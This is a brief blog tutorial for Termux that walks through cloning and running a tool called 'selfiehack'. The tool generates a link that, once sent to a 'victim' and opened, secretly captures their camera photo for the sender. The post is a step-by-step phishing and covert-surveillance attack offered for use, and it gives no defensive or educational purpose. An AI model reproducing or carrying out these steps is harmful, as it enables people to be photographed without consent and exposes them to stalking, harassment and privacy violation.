How to create photo capture link in termux ?

$  aptupdate && apt upgrade

$ pkg install php

$ pkg install curl perl php openssh wget

$ git clone https://github.com/JTECHCODE/selfiehack.git

$ ls
$ cd selfiehack

$ chmod +x *

$ ./selfiehack.sh

on your mobile hotspot
After select 2
$ 2
Copy to the link send victim
Once the enemy has opened the link you can see his photo in termux

$ ls

How to view image

termux-open --view (image name)
 Any doubt come what's app group send screenshot

My WhatsApp group Link





Enjoy! Follow us for more


No comments:

Post a Comment

How to connect to an FTP server from Linux?

To connect to an FTP server from a Linux system, you can use either a command-line FTP client or a graphical one. Here’s how to do it usin...